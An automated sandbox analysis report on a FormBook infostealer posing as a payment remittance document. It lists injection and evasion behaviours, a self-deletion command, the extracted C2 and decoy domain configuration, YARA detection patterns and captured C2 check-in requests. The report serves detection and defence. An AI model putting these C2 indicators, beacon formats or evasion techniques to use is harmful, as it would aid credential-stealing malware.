
Windows Analysis Report: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe

Overview

General Information

Sample Name: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Analysis ID: 483527
MD5: e29285288905ebb27d9e4443bcaa6638
SHA1: 3c656f9257b7630e47f57d1326bceafb7481ab29
SHA256: 7027a232f8327a532a1b37586cd42ea73ea0b9c37b1b22334484888f0b13b6b6

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe (PID: 3176 cmdline: 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe' MD5: E29285288905EBB27D9E4443BCAA6638)
    • Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe (PID: 4180 cmdline: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe MD5: E29285288905EBB27D9E4443BCAA6638)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 1392 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • raserver.exe (PID: 3652 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 912 cmdline: /c del 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fasilitatortoefl.com/uytf/"], "decoy": ["estherestates.online", "babyballetwigan.com", "ignorantrough.xyz", "moominmamalog.com", "pasticcerialemmi.com", "orangstyle.com", "oldwaterfordfarm.com", "aiiqiuwnsas.com", "youindependents.com", "runbank.net", "phytolipshine.com", "almedmedicalcenter.com", "czxzsa.com", "yummyblockparty.com", "gadgetinfo.info", "cloudfolderplayer.com", "chowding.com", "xn--tarzmbu-ufb.com", "danielaasab.com", "dreampropertiesluxury.com", "itsready.support", "freepoeople.com", "richesosity.online", "covidbrainfogsyndrome.com", "hide.osaka", "fitotec.net", "cdfdwj.com", "vjr.realestate", "knowit.today", "sellhomefastinorlando.com", "permacademy.net", "andhraadvocates.com", "rochainrevsry.xyz", "casino-virtuali.net", "liptondesignstudio.xyz", "keyinternationals.com", "gamifibase.com", "atjehtimur.com", "hobonickelsvillarrubia.com", "johnharrisagent.com", "preabsorb.xyz", "likevietsub38.com", "getrichandsavetheworld.com", "livelife2dance.com", "juesparza.com", "buffalocreekdesign.com", "diegos.xyz", "covidforensicaudit.com", "popitperu.com", "gczvahqeg.site", "aspireship.tech", "freedomforfarmedrabbits.online", "pasalsacongress.com", "custommetalimagery.photography", "managementcoachinginc.com", "hxysjkj.com", "trusticoin.biz", "wireconnectaz.tech", "yoiseikatsu.net", "slggroups.com", "curiousmug.com", "svetarielt.site", "nongormart.com", "btt5204.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(24 further memory dump entries not shown on this page)

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked PE entry not shown on this page)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.fasilitatortoefl.com/uytf/"], "decoy": ["estherestates.online", "babyballetwigan.com", "ignorantrough.xyz", "moominmamalog.com", "pasticcerialemmi.com", "orangstyle.com", "oldwaterfordfarm.com", "aiiqiuwnsas.com", "youindependents.com", "runbank.net", "phytolipshine.com", "almedmedicalcenter.com", "czxzsa.com", "yummyblockparty.com", "gadgetinfo.info", "cloudfolderplayer.com", "chowding.com", "xn--tarzmbu-ufb.com", "danielaasab.com", "dreampropertiesluxury.com", "itsready.support", "freepoeople.com", "richesosity.online", "covidbrainfogsyndrome.com", "hide.osaka", "fitotec.net", "cdfdwj.com", "vjr.realestate", "knowit.today", "sellhomefastinorlando.com", "permacademy.net", "andhraadvocates.com", "rochainrevsry.xyz", "casino-virtuali.net", "liptondesignstudio.xyz", "keyinternationals.com", "gamifibase.com", "atjehtimur.com", "hobonickelsvillarrubia.com", "johnharrisagent.com", "preabsorb.xyz", "likevietsub38.com", "getrichandsavetheworld.com", "livelife2dance.com", "juesparza.com", "buffalocreekdesign.com", "diegos.xyz", "covidforensicaudit.com", "popitperu.com", "gczvahqeg.site", "aspireship.tech", "freedomforfarmedrabbits.online", "pasalsacongress.com", "custommetalimagery.photography", "managementcoachinginc.com", "hxysjkj.com", "trusticoin.biz", "wireconnectaz.tech", "yoiseikatsu.net", "slggroups.com", "curiousmug.com", "svetarielt.site", "nongormart.com", "btt5204.com"]}
Multi AV Scanner detection for submitted file
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Virustotal: Detection: 28%
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | ReversingLabs: Detection: 57%
Yara detected FormBook
Source: Yara match | File source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Joe Sandbox ML: detected
Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.302407881.0000000001390000.00000040.00000001.sdmp, raserver.exe, 00000013.00000002.477861762.000000000484F000.00000040.00000001.sdmp
Source: Binary string: RAServer.pdb source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.301852623.0000000000F59000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.302407881.0000000001390000.00000040.00000001.sdmp, raserver.exe
Source: Binary string: RAServer.pdbGCTL source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.301852623.0000000000F59000.00000004.00000020.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\HJmNUXoTNN\src\obj\Debug\SerializationHeaderReco.pdb source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49784 -> 198.54.117.211:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49784 -> 198.54.117.211:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49784 -> 198.54.117.211:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.yummyblockparty.com
Source: C:\Windows\explorer.exe | Domain query: www.fitotec.net
Source: C:\Windows\explorer.exe | Domain query: www.johnharrisagent.com
Source: C:\Windows\explorer.exe | Domain query: www.btt5204.com
Source: C:\Windows\explorer.exe | Network Connect: 52.71.133.130 80
Source: C:\Windows\explorer.exe | Domain query: www.hide.osaka
Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.211 80
Source: C:\Windows\explorer.exe | Network Connect: 103.15.104.66 80
Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.215 80
Source: C:\Windows\explorer.exe | Domain query: www.itsready.support
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.fasilitatortoefl.com/uytf/
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View | ASN Name: GIGABIT-MYGigabitHostingSdnBhdMY GIGABIT-MYGigabitHostingSdnBhdMY
Source: global traffic | HTTP traffic detected: GET /uytf/?4hax=Z6tv0ZGri8uWurB8AUDeWgq8Hn78EURDlDEEMIHUNMQGUG9NVGnXX5+ZYyjQXpOA0JMU&6lE=xT6Pc HTTP/1.1 Host: www.yummyblockparty.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uytf/?4hax=1GgOydTR9rFB1tFiaPZsKtEWQf/ik/nrf61jzTsng/4mIf33LxMFmIGp7DtpN0+eCTBT&6lE=xT6Pc HTTP/1.1 Host: www.johnharrisagent.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uytf/?4hax=Lw8pQUl/qe2gQHW8JEklnfX9vlL4ErZAhlphDfsrttl8uYXfrtRE5waSCzthMEOsFHNR&6lE=xT6Pc HTTP/1.1 Host: www.itsready.support Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uytf/?4hax=0R01lDMz+xXIWoinSyO5qQyNMJHeVacFioz47MHPNe7DMd9wx+TtySfTu0uIVXra7tyR&6lE=xT6Pc HTTP/1.1 Host: www.btt5204.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 52.71.133.130 52.71.133.130
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226460143.0000000002841000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213161728.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213161728.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com%$I/d
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com9
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comYou
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213196484.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comm
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.como
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.como..
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comueh
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comva
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213244678.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comy
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213196484.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comypo
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comz
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216127582.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com-O6d
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com.TTFsO
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216064181.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216985898.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comF
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216099763.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comS
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comals
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216461639.0000000005F35000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comasF
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.219234603.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comceva
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216127582.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comcomS
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comd
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216654283.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comdAO
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216627255.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comgritaHO
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.219234603.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comgritolOyd
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216654283.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.como
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216064181.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comrsiv
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216654283.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comttF
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comttod
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213011209.0000000005F2D000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212822532.0000000005F2D000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213011209.0000000005F2D000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cncz
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213011209.0000000005F2D000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnly
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217666193.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217951742.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217690168.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212488825.0000000005F2D000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212488825.0000000005F2D000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.krKKd
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213811208.0000000005F2D000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/-O6d
